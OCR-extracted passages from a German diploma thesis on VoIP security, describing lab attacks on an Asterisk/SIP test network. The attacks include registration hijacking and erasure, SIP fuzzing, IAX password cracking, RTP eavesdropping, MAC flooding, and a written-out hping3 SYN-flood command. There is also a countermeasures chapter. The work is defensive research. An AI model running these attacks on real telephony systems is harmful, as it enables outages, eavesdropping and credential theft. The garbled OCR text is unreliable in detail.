174. dia org wiki Portscan ner http de wikipedia org wiki Fuzzing http de wikipedia org wiki Proxy_S erver http de wikipedia org wiki Q 931 S Sch r MAS 06 02 20 Seite 203 RSA RTCP RTP S MIME SCCP SCTP SDP SIP SIPCrack SIPS SIPSCAN SiVuS eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz RSA ist ein asymmetrisches Kryptosystem das sowohl zur Verschl sselung als auch zur digitalen Signatur verwendet werden kann Es verwendet ein Schl sselpaar bestehend aus einem privaten Schl ssel der zum Entschl sseln oder Signieren von Daten verwendet wird und einem ffentlichen Schl ssel mit dem man verschl sselt oder Signaturen pr ft Der private Schl ssel wird geheim gehalten und kann nicht oder nur mit extrem hohem Aufwand aus dem ffentlichen http de wikipedia org wiki RSA Schl ssel berechnet werden Kryptosystem Das RealTime Control Protocol RTCP dient der Aushandlung und Einhaltung von QUser Agentlity of Service QoS Parametern durch den periodischen Austausch von Steuernachrichten zwischen Sender und Empf nger Dazu erfolgt eine http de wikipedia org wiki RTCP Das Real Time Transport Protocol RTP ist ein Protokoll zur kontinuierlichen bertragung von audiovisuellen Daten Streams ber IP basierte Netzwerke Das Protokoll wurde erstmals 1996 im RFC 1889 standardisiert 2003 wurde ein berarbeiteter RFC ver ffentlicht Der RFC 355
175. direkt gesendet werden In beiden F llen muss die Nachricht so aussehen als h tte sie einer der beiden Gespr chspartner gesendet Mittels Wireshark Trace aufgezeichnete Initiierung Paket Nr 26 des zu trennenden Gespr ches bis hin zur Gespr chsdurchschaltung Paket Nr 44 User Agent 7129 10 1 1 129 ruft User Agent 7111 10 1 1 121 User Agent 7111 beantwortet den Anruf und es kommt zur Gespr chsdurchschaltung ende x w wireshark dump _neu2009 pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter sip Expression Clear Apply Source Destination Protocol Info u E Ethernet II Src Dell_t0 22 43 00 14 22 70 22 43 DSt Aastra_19 40 8f 00 08 5d 19 40 8r Z Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 121 10 1 1 121 User Datagram Protocol Src Port sip 5060 Dst Port sip 5060 amp Session Initiation Protocol Request Line INVITE sip 4111 10 1 1 121 5060 transport udp SIP 2 0 Method INVITE Resent Packet False E Message Header via SIP 2 0 UDP 10 1 1 101 5060 branch z9he4bkK3871116e rport From ben lt sip 4129 10 1 1 101 gt tag as346f1fc4 SIP Display info ben s p from address sip 4129 10 1 1 101 SIP tag as346fifc4 To lt sip 4111 10 1 1 121 5060 transport udp gt SIP to address sip 4111 10 1 1 121 5060 contact lt sip 4129 10 1 1 101 gt 8 Contact Binding lt sip 4129 10 1 1 101 gt Call ID 4b8190
176. dlists hinzugef gt werden gegen welche der MD5 Hashwert gepr ft werden soll Solche WoOrterlisten sind im Internet sehr verbreitet und k nnen herunter geladen werden Diese W rterlisten sind nichts anderes als eine sehr grosse Sammlung von W rtern und sind meist sogar in sprachregionalen gross klein oder gemischter Schreibweise numerischen alphanumerischen Varianten erh ltlich Dictionary Attack gt u u ke Dictionary Add to list Insert Change initial file position Reset initial file position Key Rate nN Reset all initial file positions Dictionary Position Remove from list WSSAP Remove All Nach dem Einf gen der gew nschten Worterlisten wird die Dictionary Attacke gestartet Zuvor k nnten unter Options je nach Konstellation der W rterlisten noch bestimmte Optionen bez glich der Suchart ausgew hlt werden So k nnen zum Beispiel folgende Varianten mit in die Suche des Passwortes einbezogen werden Drehe die W rter in der Wortliste um so dass auch r ckw rts geschriebene Passw rter gefunden werden Wandle die W rter der Wortliste auch alle in Gross oder Kleinbuchstaben um und vergleiche so Teste mit jedem Wort der W rterliste ob beim Passwort eine Zahl zwischen 0 99 hinten dran steht etc F r einen gekrackten Hashwert wird dann auch gleich das entschl sselte Passwort in Klartext dargestellt In diesem Beispiel hat der User Agent 4119 das das Passwort mallorca Nach e
177. dvertisement 439 112 158107 19 3 2553325537 NENS Registration NB TESTNETZCITRIX1 lt 00 gt SA0 LL22 908016 10 1712 oO A022255 NBNS Registration NB TESTNETZCITRIX1 lt 00 gt Frame 438 50 bytes on wire 50 bytes captured Ethernet II Src Vmware_55 dd b4 00 0c 29 55 dd b4 DSt Dell_f0 22 43 00 14 22 f0 22 43 Internet Protocol Src 10 1 1 2 140 1 1 2 Dst 10 1 1 112 10 1 1 112 version 4 Header length 20 bytes Differentiated Services Field Ox0O DSCP 0x00 Default ECN 0x00 Total Length 36 Identification OxcOOd 49165 Flags 0x00 Fragment offset O Time to live 128 Protocol ICMP Ox01 Header checksum 0x6458 correct Source 10 1 1 2 10 1 1 2 Destination 10 1 1 112 10 1 1 112 Internet Control Message Protocol N Das Tool irdpresponder sendet nicht nur an aufstartende und anfragende Hosts Antworten Periodisch sendet es den aktiven Hosts eine Router Advertisement Nachricht Mit dieser Nachricht wird den Hosts mitgeteilt dass der Gateway berhaupt und unter welcher IP Adresse erreichbar ist WH Trace 112 startet auf aktueil pcap Wire har EEE Eile Edit View Go Capture Analyze Statistics Help Filter Expression Clear Apply No Time Source Destination Protocol Info 138 709551 compal n _0b ad 96 Broadcast who has 10 1 1 1 Tell 10 1 1 241 Netopia_21 79 14 compal n_0b ad 96 10 1 1 1 is at 00 0f cc 21 79 14 EFF FF 255 255 255 255 Mobi fe IP Advertisement 50
178. e Full packet 1 000 0000 0000 0011 Source call 3 000 0000 0000 0011 Destination call 3 OD ee ee Retransmission False Timestamp 5 Outbound seq no 1 Inbound seq no 1 Type IAX 6 TAX subclass REGREQ 13 3 Information Element Username Cpeer or user for authentication 4131 IE id username peer or user for authentication Ox06 Length 4 username peer or user for authentication 4131 Information Element MDS challenge result Fd18b267f8eb3275d6e676602b3f8ac9yd IE id MDS challenge result Ox10 7 Length 32 MDS challenge result Fd18b267f8eb3275d6e676602b3f8ac9y Wud Die obigen gesnifften Daten Challenge und MDS Hashwert m ssen nach dem Starten von IAX Brute exe aus der Commandline von Windows heraus nur noch an der richtigen Stelle eingegeben werden Auch muss der Speicherort des Dictionary Files angegeben werden worin alle m glichen zu pr fenden Passw rter gespeichert sind Das Passwort f r den IAX Client 4131 wurde erfolgreich gekrackt und ist sascotel WINDOWS system32 cmd exe x I F ProgrammeniSEC Partners IAX Brute gt IAX Brute exe NoIP IAX Password Tester iSEC Partners Copyright 2805 lt c http wuw isecpartners com Written by Himanshu Dwivedi What dictionary file do you wish to test e g isec dict txt gt dict_sample txt Loaded 279558 dictionary words from dict_sample txt Please type in the captured Challenge Data value lt Challenge Data in your sniffed IAX session 2
179. e 74 65 6e 74 2d 01b0 4c 65 6e 67 74 68 3a 20 30 0d 0a Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 66 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz SIP PAYLOAD for packet REGISTER sip 10 1 1 101 SIP 2 0 Via SIP 2 0 UDP 10 1 1 121 branch 221 1 c8fb d40e 4494 b070 e8c309db3095 From 4111 lt sip 4111 10 1 1 101 gt tag 22122e86 d40e 4494 a154 1dff7d9988e3 To lt sip 4111 10 1 1 101 gt Supported replaces Call ID 22126127 d40e 4494 b1 18 cele0b607a5e CSeq 100 REGISTER User Agent Hacker Max Forwards 16 Allow INVITE ACK CANCEL BYE NOTIFY REFER OPTIONS INFO SUBSCRIBE Content Length 0 closing socket aok Der parallel zum L schen der Registrierung aufgezeichnete Wireshark Trace zeigt dass mit Paket Nr 50 die Meldung remove all bindings zum Registrar bermittelt wird In Paket Nr 52 best tigt dann der Registrar mit O bindings zur ck dass die Registrierung f r diesen User Agent gel scht wurde GW erease efehl pcap Wieser zz d oh x File Edit View Go Capture Analyze Statistics Help Filter sip Expression Clear Apply Source Destination Protocol Info Request R s on wire 485 bytes captured Ethernet II Src vmware_55 dd b4 00 0c 29 55 dd b4 Dst Dell_f0 22 43 00 14 22 f0 22 43 f Internet Protocol Src 10 1 1 107 10 1 1 107 Dst 10 1 1 101 10 1 1 101 User Datagram Protocol Src Po
180. e ARP Tabellen in einem Netzwerk so zu ver ndern dass anschlie end der Datenverkehr zwischen zwei Rechnern in einem Computernetz abgeh rt oder manipuliert werden kann IP F hige Telefonanlage PBX der Aastra Telecom Asterisk ist eine freie Software die alle Funktionalit ten einer herk mmlichen Telefonanlage abdeckt Asterisk unterst tzt Voice over IP VoIP mit unterschiedlichen Protokollen und kann mittels relativ g nstiger Hardware mit Anschl ssen wie POTS analoger Telefonanschluss ISDN Basisanschluss BRI oder Prim rmultiplexanschluss PRI E1 oder T1 verbunden werden Authentifizierung v griech authentikos f r Anf hrer ist der Vorgang der berpr fung Verifikation einer behaupteten Identit t beispielsweise einer Person oder eines Objekts wie beispielsweise eines Computersystems In der Informationstechnologie bezeichnet sie die Zuweisung und berpr fung von Zugriffsrechten auf Daten und Dienste an Systemnutzer Die Autorisierung erfolgt meist nach einer erfolgreichen Authentifizierung BackTrack englisch zu Deutsch etwa Zur ckverfolgung ist eine von einer Live CD einem USB Stick oder bers Netzwerk bootende Linux Distribution zur berpr fung der Sicherheit einzelner Rechner in Netzwerken sowie der Gesamtsicherheit des Netzwerks Zur Kommunikation zwischen den Switches wird das Bridge Protokoll genutzt Die Bezeichnung Switch ist abgeleitet von Bridge da Switches die Weiterentwicklung der Bri
181. e Field Beschreibt den MIME Typ der Nutzdaten Content Length Field Beschreibt die Gr sse der Nutzdaten im Paket Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 28 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Aufbau einer SIP Meldung Header Field Message Body Quelle Bild http download oracle com docs cd E12529_01 wlss3 1 programming wwimages message blocks gif 2 1 4 SIP Responses SIP Responses sind 3 Zeichen lang wobei das erste Zeichen die Kategoriezugeh rigkeit beschreibt SIP Responses werden meist als eine Antwort Information oder Best tigung einer zuvor erhaltenen SIP Nachricht dessen Sender zur ck gesendet Untenstehende Tabelle soll eine bersicht der m glichen SIP Responses geben Response Kategorie Code 1xx Responses Information Responses 100 Trying 180 Ringing 181 Call is Being Forwarded 182 Queued 183 Session Progress 2xx Responses Successfull Responses 200 OK 3xx Responses Redirection Responses 300 Multiple Choices 301 Moved Permanently 302 Moved Temporarily 303 See Other 305 Use Proxy 380 Alternative Service 4xx Responses Request Failure Responses 400 Bad Request 401 Unauthorized 402 Payment Required 403 Forbidden 404 Not Found 405 Method Not Allowed 406 Not Acceptable 407 Proxy Authentication Required 408 Request Timeout 409 Conflict 410 Gone 411 Length Required 413 Request Entity Too Large 414 Request URI Too
182. e Schule Schweiz Datennetzwerkes f r die Sprachkommunikation oder f r die Vernetzung verschiedener Standorte ber IP Pausenlos werden PING Pakete Echo Requests an das Zielobjekt gesendet Das Ger t ist nur noch damit besch ftigt diese Requests zu beantworten und kann die eigentliche Aufgabe nicht mehr erledigen DoS Attacke Realtime Control Protocol Erg nzendes Steuerprotokoll f r RTP zur Gew hrleistung von QOS und gesicherten Bandbreiten Einschleusen falscher Routen in Router oder Switch M glich wenn keine oder nur Standard Passw rter in Netzkomponenten verwendet werden Somit kann der Datenstrom ber den PC des Angreifers MitM oder zu einem ung ltigen Ziel DoS Angriff gelenkt werden Real Time Transport Protocol Protokoll f r die bertragung von Sprachdaten und Video ber UDP verwendet von SIP und H 323 Session Description Protocol wird bei SIP und H 323 eingesetzt um Eigenschaften des Mediendatenstroms auszuhandeln Beispiele Codec Transportprotokoll Session Initiation Protocol Signalisierungsprotokoll f r den Auf und Abbau von Verbindungen nicht nur Sprache in IP Netzen Skinny Client Control Protocol SCCP ist ein propriet res Protokoll von Cisco Eingesetzt wird es zwischen dem Call Manager und den Skinny Clients Propriet res VOIP Protokoll zum Telefonieren ber das IP Netzwerk und Internet Angreifer sendet in ein Netzwerk PDU Pakete welche den Switch dazu zwingen fortw hrend die Spanni
183. e for jar file name reading data from jar file c07 sip r2 jar Sending Test Case 0 test case 0 439 bytes Sending Test Case 1 test case 1 438 bytes Sending Test Case 2 test case 2 447 bytes ending Test Case 4524 test case 4524 503 bytes Sending Test Case 4525 test case 4525 542 bytes Sending Test Case 4526 test case 4526 542 bytes bt protos voip ok ok Protos Test Suite hat die 4527 Test Cases beendet ohne einen Fehler herauszugeben Zu bemerken gilt es aber dass der validcase Test Pr fung nach jedem Test Case ob das Angriffsziel immer noch mit einem Response antwortet nicht eingeschaltet war dieser kann nur in Zusammenhang mit Tests gegen die User Agents direkt eingeschaltet werden W hrend dem Test wurde versucht eine Gespr chsverbindung von User Agent 4111 zu User Agent 4129 und umgekehrt aufzubauen In beiden F llen kam keine Verbindung zu Stande Es kann also gesagt werden dass Asterisk w hrend des Angriffes nicht verf gbar war Untenstehender Wireshark Trace zeigt dass zwar eine INVITE Nachricht von 4111 mit der IP Adresse 10 1 1 121 an Asterisk gesendet diese jedoch nie mit einer Response Nachricht beantwortet wird 2874 53 768245 10 1 1 121 10 1 1 101 SIP SDP Request INVITE Sip 4129 10 1 1 101 with session description Inmitten der Test Cases ist der PBX Manager mit welchem der SIP Proxy Server amp PBX Asterisk konfiguriert wird stehen geblieben und blockiert worden Der SIP Proxy Ser
184. e verloren Auch wenn der betroffene Endpoint sich wieder ordnungsgem ss registriert kann der Angreifer die Nachricht zum L schen immer wieder senden Passiert dies innert sehr kurzen Zeitintervallen unterst tzt durch ein selbst geschriebenes Script welches nemesis mit entsprechendem Befehl periodisch aufruft so ist das Angriffsziel fast nicht mehr erreichbar Wird dieser Angriff auf s mtliche Terminals eines Betriebes ausgeweitet so ist dieser praktisch lahm gelegt was dessen Erreichbarkeit betrifft 5 5 Bemerkungen zu den H 323 Angriffen Es wurden noch weitere Angriffe gegen das Protokoll H 323 vorgenommen welche jedoch alle ohne Erfolg blieben Die Logfiles dazu sind auf der beiliegenden DVD enthalten Da dieses Protokoll immer mehr durch SIP verdr ngt wird sind auch dementsprechend nicht so viele Angriff Tools verf gbar wie gegen SIP Es wurden auch ltere H 323 Angriff Tools gefunden welche durch sicherheitsrelevante Protokoll Anpassungen Implementierungen ihre Wirkung verloren haben Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 112 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 RTP Real time Transport Protocol Einf hrung Die IETF entwickelte 1996 das RTP Protokoll und ver ffentlichte dies im RFC 1889 und RFC 1890 Mit dem berarbeiteten und neu definierten RFC 3550 wurde im Jahr 2003 RFC 1889 abgel st Das RTP Protokoll wird f r den verbindungslosen
185. e wurde einfach nochmals die SIP Registrierung via SiVuS welche im vorderen Beispiel verwendet wurde an den SIP Proxy Server Registrar gesendet jedoch diesmal mit ung ltiger IP Adresse in der Contact Information lt sip 4115 133 133 133 133 Im Trace ist zu sehen wie mit Paket Nr 381 ein INVITE ankommender Anruf von User Agent 4111 10 1 1 121 kommt welcher mit User Agent 4119 sprechen m chte Infolge der gehijackten Registrierung will der SIP Proxy Server Asterisk PBX diesen INVITE an die IP Adresse 133 133 133 133 senden welche es im Netzwerk nicht gibt In Paket Nr 540 wird dennoch nach diversen INVITE Versuchen eine Meldung 200 OK zur ck an 4111 gesendet Dies kommt daher dass der SIP Proxy Server ja auch zugleich die PBX Asterisk ist Asterisk ist so programmiert dass wenn ein User Agent nicht erreichbar ist nach einer gewissen Zeit automatisch versucht wird den Anrufer auf dieVoice Mail Box des Angerufenen zu vermitteln Dazu wird der Anruf von der PBX entgegengenommen welche dann dadurch die Meldung 200 OK zur ck an den Anrufenden sendet Nach einer negativen Pr fung betreffend dem Vorhandensein einer Voice Mail Box beendet Asterisk diesen Call mittels der Meldung BYE welche an User Agent 4111 gesendet wird Somit gehen alle eingehenden Anrufe f r die Nummer 4119 ins Leere Eile Edit View Go Capture Analyze Statistics Help Filter sip Expression Clear Apply No Time Destination Prot
186. e zu allozierende Arbeitsspeicher ist anzugeben 512 MB sind angebracht und lassen die virtuelle Maschine mit vern nftigen Antwortzeiten bedienen Optional kann noch ausgew hlt werden ob ein oder zwei Prozessoren des PC s f r die virtuelle Maschine gebraucht werden sollen sofern der PC berhaupt mit zwei Prozessoren ausger stet ist Mit next wird die n chste Seite aufgerufen Create Virtual Machine Name and Location Guest Operating System Hard Disk Properties Network Adapter Properties CD DVD Drive Properties Floppy Drive Properties USB Controller Create Virtual Machine Pages Memory Increasing a virtual machine s memory allocation can improve its Performance but may also impact other running applications Size 5i2 5 BI en Recommended Size 256 MB Recommended Minimum 32 MS The guest operating system may not start up below this size Recommended Maximum 8192 MB Memory swapping may occur above this size Processors Select the number of processors carefully We do not recommend reconfiguring this value after installing the guest operating system count Es wird keine virtuelle Disk ausgew hlt und mit next best tigt Hard Disk Name and Location Guest Operating System Memory and Processors Hard Disk Network Adapter Properties CO DVD Drive Properties Floppy Drive Properties USB Controller Ready to Complete Diplomarbeit VOIP Security A
187. ecurity 19 02 2009 S Sch r MAS 06 02 20 Seite 181 oo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 182 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 183 oo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 184 oo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 185 oo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 7 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 186 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 Massnahmen gegen Angriffe 8 1 Massnahmen gegen Angriffe auf das SIP Siganlisierungsprotokoll Die Problematik bei der Absicherung des Signalisierungsprotokolls bei SIP ist dass bei der Signalisierung meistens mehrere Komponenten involviert sind welche diese Nachrichten lesen verstehen und teilweise sogar ndern m ssen Aus diesem Grund kann kein simpler End zu E
188. ecurity Configuration Changes via SNMP Enable w Filtering Security Mode Single MAC Per Pott Sl security Security Action Trap v Password Management Access Allowed Source MAC Addresses etwork Access Index MAC Address Allowed Port List Fault Management 1 o0 14 22 40 22 43 10 6 2 5 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Es gibt viele Arten des MAC Spoofings Die zwei aufgezeigten sind die klassischen Angriffe dieser Art Einerseits wurde die Verf gbarkeit eines Systems gestoppt und andererseits hat sich der Angreifer Zugang zu einem Netzwerk verschafft wo er keinen haben sollte Dieser Angriff gezielt eingesetzt an einem neuralgischen Punkt im Netzwerk zum Beispiel gegen den SIP Proxy Server kann sehr effektiv sein und zum Ausfall der ganzen Telefonie Infrastruktur f hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 142 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 6 3 1 MAC Flooding Integrit t ER eenneenseetseen x Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x EtherFlood exe Downloadlink Quelle des Tools Schweregrad http ntsecurity nu toolbox etherflood 1 leicht 6 schwer Hinweise zu Installation Verfiigbarkeit Installation Tool 4 Anwendung Tool
189. ef hrt hping3 S 10 1 1 101 a 10 1 1 101 k s 135 p 135 flood Die Werte im Einzelnen stehen wie folgt f r hping3 Aufruf Programm S 10 1 1 101 Gespoofte Source IP Adresse der SYN Pakete muss IP des Angriffziels sein a 10 1 1 101 IP Adresse des Angriffziels s 135 Port Source muss Port des Angriffziels sein siehe Bemerkung p 135 Port des Angriffziels flood Ruft Flooding Attacke von hping3 auf Bemerkung Es muss nicht unbedingt der Port 80 angegriffen werden bei diesem Beispiel ist es Port 135 Dieser Port ist der Endpoint Mapper Hosts fragen auf diesem Port beim Server nach verf gbaren Diensten und Versionen nach z Bsp DHCP Server DNS Server WINS Server etc default routing e mo gging info etri z to ttl default to dst nd trl z p for every matching packet received Mor hping3 S 10 1 1 101 HPING 18 1 1 101 eth 10 hping in flood mode r 19 1 1 191 hping stati 4514 packets tramitted und trip nin avg max 0 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 177 e eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Mit Paket Nr 89 sendet der Angreifer das gespoofte SYN Paket zum Asterisk Proxy Server Dann sendet dieser sich darauf mit Paket Nr 90 selbst eine Antwort welche er f lschlicherweise wiederum als SYN Paket versteht So wiederholt sich jetzt der eigene Aufruf bis keine freien Ressourcen mehr beim Angriffsziel v
190. efand Das Angriffsziel geht davon aus dass dieses Lachen von der Gegenseite also seinem Kommunikationspartner stammt gesinfft Verbindungsaufbau_251 sendet sound pcap Wireshark Eile Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info PEEP WERE VEL 1053715101 10 1 1 241 UDP Source port 14354 Destination port 50076 E Frame 15035 214 bytes on wire 214 bytes captured E Ethernet II Src vmware_42 86 fe 00 0c 29 42 86 fe Dst CompalIn_Ob ad 96 00 1e ec 0b ad 96 amp Destination CompalIn_0b ad 96 00 1e ec 0b ad 96 Address CompalIn_Ob ad 96 00 1e ec 0b ad 96 Dee eae O soon wees ees IG bit Individual address unicast a O naas wees wees eee LG bit Globally unique address factory default amp Source vmware_42 86 fe 00 0c 29 42 86 fe Address vmware_42 86 fe 00 0c 29 42 86 fe pagina See O isce 2200 ssor nn IG bit Individual address unicast SL O 2 seen nenn eee LG bit Globally unique address factory default Type IP 0x0800 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 241 10 1 1 241 User Datagram Protocol Src Port 14354 14354 Dst Port 50076 50076 Source port 14354 14354 Destination port 50076 50076 Length 180 Checksum 0x0000 none Data 172 bytes Matas RNANNS1RANNICKNRNGIACACAN ACSAINAGAC PAPANCACAMN TIN N amp Als Vergleich untenstehend eine original
191. egebenen Argumente sind mit OK zu best tigen Configuration Dialog em Challenge Spoofing Filters and ports HTTP Fields Traceroute Sniffer APR Amp Poison Routing l EE TEE 10 1 1 199 BR Device NPF_ 419223BA E201 4532 0 0 0 0 0 BEB Device NPF_ E2614F75 975C 4032 0 0 0 0 BR Device NPF_ 6404754C 727C 4188 0 0 0 0 BEY Device NPF_ 3DD3C4EC 169D 48C 0 0 0 0 BIT soo X r Winpcap Version 40 0 1040 Current Network Adapter Device NPF_ BE0913C0 6703 4228 8762 77A2532F62A0 WARNING Only ethemet adapters supported Options W Start Sniffer on startup 17 Dont use Promiscuous mode 7 Start APR on startup Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 116 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Der Tab sniffer ist zu w hlen ebenfalls muss darauf geachtet werden dass die Sniffer Funktion aktiv ist Das zweite Icon oben links best tigt dies ansonsten ist der Sniffer durch Mausklick auf dieses Icon einzuschalten File View Configure Tools Help ss Gm Hm vv 2 Rom mea Oe 2 oF fh Decoders I gt Network Sniffer Ea Cracker Traceroute er CDU is Wireless ES Query l Started Closed LEG Codec IP2 Codec _ Status A File 4 am E amp vor Lost packets 0 Sobald der Sniffer RTP Sprachpakete auf dem Netzwerk detektiert werden diese a
192. egen Wert 2 10 1 Denial of Service Registration Remove lntegrit t Vertraulichkeit Eingesetztes Tool Verf gbarkeit x erease_registrations Downloadlink Quelle des Tools Schweregrad http www hackingvoip com sec_tools html 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Mit dem L schen der Registrierung eines User Agents wird dessen Erreichbarkeit ausgeschaltet Ab dem Zeitpunkt des L schens kann das Angriffsziel keine ankommenden Anrufe mehr bekommen Abgehend hat der User Agent dennoch die M glichkeit Gespr che f hren zu k nnen Sendet er im unregistrierten Zustand eine INVITE Nachricht an den SIP Proxy Server wird er zuerst aufgefordert sich wieder zu registrieren Ein Angreifer kann jedoch mittels einfach zu schreibendem Script welches in kurzen Zeitintervallen die Registrierung immer wieder mit dem Tool erase_registrations von neuem l scht verhindern dass das Angriffsziel nie f r lange Zeit erreichbar sein wird Schutz gegen Angriff Analyse Zeit des automatischen Registrierungs Inte
193. egen die VOIP Systeme vornehmen Untenstehend ist zu sehen wie zenmap durch den Befeh l nmap sU p 5060 10 1 1 0 24 alle aktiven am Netzwerk angeschlossenen Hosts und Server mit offenem 5060 Port auflistet Scan Toots Profile Help Target Profile Command nmap sU p 5060 10 1 1 0 24 f 1 Ghosts Services Nmap Output Ports Hosts Topology Host Details Scans os Host nmap sU p 5060 10 1 1 0 24 IDARI Starting Nmap 4 76 hrrp nmap org at 2008 12 23 13 45 Mitteleurop ische Zeit 5 10 1 1 101 Interesting ports on 10 1 1 1 1011102 ZENER STATE SERVICE 5060 udp closed sip 10 1 1 103 MAC Address 00 0F CC 21 79 14 Netopia w 10 1 1 121 Interesting ports on 10 1 1 101 E 10 1 1 129 PORT STATE SERVICE 5060 udp open filtered sip s TESE MAC Address 00 14 22 F0 22 43 Dell 10 1 1 241 Interesting ports on 10 1 1 FORT STATE SERVICE SO60 udp closed sip MAC Address 00 16 E3 55 3F Interesting ports on 10 1 1 PORT STATE SERVICE 50680 udp closed sip MAC Address 00 80 F0O 5F 67 Interesting ports on 10 1 1 PORT STATE SERVI 5060 udp open filtered sip MAC Address 00 08 5D 19 40 Interesting ports on 10 1 1 PORT STATE SERVI 5060 udp openifiltered sip MAC Address 00 08 5D 19 93 Interesting ports on 10 1 1 PORT STATE SERVICE 50680 udp closed sip MAC Address 00 1C C0 07 E3 Diplomarbeit VOIP Security 19 02 2009 102 46 Askey Computer 103
194. egen die Verf gbarkeit DoS Denial of Service m glich Ein Ausfall der ganzen Kommunikationseinrichtung wie zum Beispiel der PBX Asterisk ist f r eine Firma sehr gesch fts respektive imagesch digend und kann grosse finanzielle Folgen haben Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 40 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 4 1 Vendor specific web search Integrit t NEE RE X Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x google Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer www google ch Hinweise zu Installation Verf gbarkeit Installation Tool gt Anwendung Tool 1 Erforderliche Vorkenntnisse 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 4 Ziel Angriff Analyse Das Internet wird nach weiteren n tzlichen Informationen abgesucht welche dienlich f r einen Angriff oder zum Hacken des ganzen Systems sein k nnten Meist sind Dokumente auf dem Internet auffindbar welche eigentlich nicht f r die ffentlichkeit bestimmt w ren welche dann auch Sicherheitsl cken Administratorenzug nge und Passw rter beinhalten Auch gibt es spezielle Seiten wie zum Beispiel http www securityfocus com vulnerabilities worin von fas
195. ehr viele dieser Tools sind weder dokumentiert noch fertig entwickelt worden So entstanden sehr oft schon w hrend der Installation grosse Probleme viele liessen sich auch erst gar nicht installieren War die Installation einmal gelungen musste meist infolge schlechter oder fehlender Dokumentation herausgefunden werden wie und mit welchen Parametern der Angriff gestartet wird Vielfach gelang der Angriff nicht und die gew nschte Wirkung blieb aus Dann begann die Suche nach einem entsprechenden Angriffs Tool f r diesen speziellen Angriff von Neuem und damit auch die n chsten Installationsprobleme Das Testen der Tools auf deren Installier und Ausf hrbarkeit hat sehr viel mehr Zeit in Anspruch genommen als eingeplant gewesen war Es mussten dazu auch noch weitere Test Rechner mit Linux und Ubuntu aufgesetzt werden F r die Angriffe auf AX und H 323 mussten ebenfalls neue Systeme wie der Asterisk Proxy Server respektive H 323 Gnugk Gatekeeper installiert werden welche jeweils eine l ngere Einarbeitungszeit betreffend deren Programmier und Konfigurations M glichkeiten erforderten Im Laufe der Suche nach weiteren Angriff Tools wurde dann BackTrack3 gefunden welches eine ganze Menge funktionierender Tools beinhaltet Jedoch waren auch diese teilweise sehr schlecht oder gar nicht dokumentiert was wiederum viel Zeit in Anspruch nahm BackTrack3 ist eine von einer Live CD einem USB Stick oder bers Netzwerk bootende Linux Distribution zur berpr
196. eichneten Sprachpakete bilden 5 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer ist mit dem Netzwerk verbunden und hat Cain amp Abel gestartet User Agent 4111 und 4129 sind aktiv miteinander in einem Gespr ch Damit der Angreifer das Netzwerk nach RTP Paketen abhorchen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Nachfolgend wird mit zwei verschiedenen Netzwerkmonitoren jeweils eine Variante aufgezeit wie der Angreifer von den aufgezeichneten RTP Sprachpaketen zum Gespr chsinhalt der Kommunikation kommt 5 24 RTP sniffing mit Cain amp Abel Version 4 9 24 Nach dem Starten von Cain amp Abel muss zuerst die gew nschte Netzwerkschnittstelle ausgew hlt werden mit welcher die Daten aufgezeichnet werden sollen gt gt Configure File View Beim Tools Help agOhBe 52 3 09mm Decoders Cached Passwords Protected Storage W LSA Secrets Press the button on the toolbar to di Es wird die Netzwerkkarte ausgew hlt Zudem kann konfiguriert werden ob der Sniffer jedes Mal beim Starten von Cain amp Abel auch gleich mitgestartet werden soll damit das Netzwerk immer abgehorcht wird Ansonsten ist die Sniffer Funktion manuell mittels 